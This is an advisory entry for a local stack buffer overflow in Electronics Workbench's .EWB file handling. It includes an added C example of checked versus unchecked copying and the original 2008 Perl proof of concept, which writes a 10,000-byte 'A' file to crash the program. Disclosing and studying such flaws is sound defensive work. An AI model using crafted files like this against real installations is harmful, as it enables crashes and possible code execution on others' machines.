Vendor: Electronics Workbench
By: Underz0ne Crew, Zigma
CVSS: 9.3 (HIGH)
Buffer Overflow (CWE-119)
Product Name: Electronics Workbench
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Local .EWB File Stack Buffer Overflow (PoC)

A stack-based buffer overflow exists in Electronics Workbench, caused by improper bounds checking of user-supplied data. It is triggered when a specially crafted .EWB file is opened, and an attacker can exploit it to execute arbitrary code in the context of the application.
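
The missing bounds check described above, as an added illustration that is not Electronics Workbench code and not part of the original advisory: a hypothetical loader copies a field from file bytes into a fixed stack buffer, first without and then with a length check. The function names, the 64-byte buffer and the newline-terminated field are assumptions; the real .EWB format and the vulnerable routine are not described on this page.

```c
/* Added illustration: hypothetical loader code, not taken from Electronics Workbench. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FIELD_CAP 64  /* assumed size of the fixed stack buffer */

/* Unsafe pattern (CWE-119): copies the field with no regard for the size of dst.
 * Shown for contrast only; it is never called in this example. */
void copy_field_unsafe(const unsigned char *src, size_t len, char *dst) {
    size_t i = 0;
    while (i < len && src[i] != '\n') { dst[i] = (char)src[i]; i++; }
    dst[i] = '\0';
}

/* Checked version: returns 0 on success, -1 if the field does not fit in cap
 * bytes including the terminator. Oversized input is rejected, not truncated. */
int copy_field_checked(const unsigned char *src, size_t len, char *dst, size_t cap) {
    size_t i = 0;
    if (cap == 0) return -1;
    while (i < len && src[i] != '\n') {
        if (i + 1 >= cap) { dst[0] = '\0'; return -1; }
        dst[i] = (char)src[i];
        i++;
    }
    dst[i] = '\0';
    return 0;
}

/* Builds n identical bytes (constructed input, same shape as a file filled with
 * one repeated character) and runs the checked copy into a FIELD_CAP stack buffer.
 * Returns the copied length, -1 if rejected, -2 on allocation failure. */
int load_repeated(size_t n) {
    char field[FIELD_CAP];
    unsigned char *data = malloc(n ? n : 1);
    if (!data) return -2;
    memset(data, 'A', n);
    int rc = copy_field_checked(data, n, field, sizeof field);
    free(data);
    return rc == 0 ? (int)strlen(field) : -1;
}

int main(void) {
    printf("63 bytes    -> %d\n", load_repeated(63));
    printf("10000 bytes -> %d\n", load_repeated(10000));
    return 0;
}
```

Rejecting the oversized field outright, rather than truncating it, keeps a malformed file from being half-loaded into later parsing stages.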

Mitigation:

Upgrade to the latest version of Electronics Workbench.
Source

Exploit-DB raw data:

#!/usr/local/bin/perl 
#
#
# OOO OOO             OO                            OOO                                
#  O   O               O                           O   O
#  O   O               O                           O   O
#  O   O  OO OO    OOOOO   OOOOO  OOO OO  OOOOOO   O   O  OO OO    OOOOO
#  O   O   OO  O  O    O  O     O   OO  O O   O    O   O   OO  O  O     O
#  O   O   O   O  O    O  OOOOOOO   O        O     O   O   O   O  OOOOOOO
#  O   O   O   O  O    O  O         O       O      O   O   O   O  O
#  O   O   O   O  O    O  O     O   O      O   O   O   O   O   O  O     O
#   OOO   OOO OOO  OOOOOO  OOOOO  OOOOO   OOOOOO    OOO   OOO OOO  OOOOO                                                                                        
#
# [+] Application               : Electronics Workbench
# 
# [+] Application's Description : (" Electronics Workbench sets the standard for affordable simulators.
#                                    The tight integration of its schematic editor, SPICE simulator and
#                                    on-screen waveforms makes what-if scenarios easy and instant.
#                                    The exceptional features of this latest release will come as no
#                                    surprise to our 80,000 previous customers. Value, power and ease of
#                                    use are what Electronics Workbench has always stood for.")
#                                    
# [+] Bug                       : Local .EWB File Stack Buffer Overflow (PoC)
# 
# [+] Author                    : Underz0ne Crew
#                                 Zigma
#
# I just got the program from my Electronics professor. Instead of simulating my homework I fuzzed it, I think I'm a geek :S, whatever
#
$filename = "fuzz.ewb";

$overflow = "A" x 10000;

print "\n\n[+] Evil file to fuzz : $filename ...\r\n";
sleep(2);

# Write the oversized buffer to the .ewb file (three-argument open, lexical filehandle)
open(my $ewb, '>', "./$filename") || die "\nCannot open $filename: $!";

print $ewb $overflow;

close($ewb);

print "\n[+]  file successfully created!\r\n";

# milw0rm.com [2008-11-30]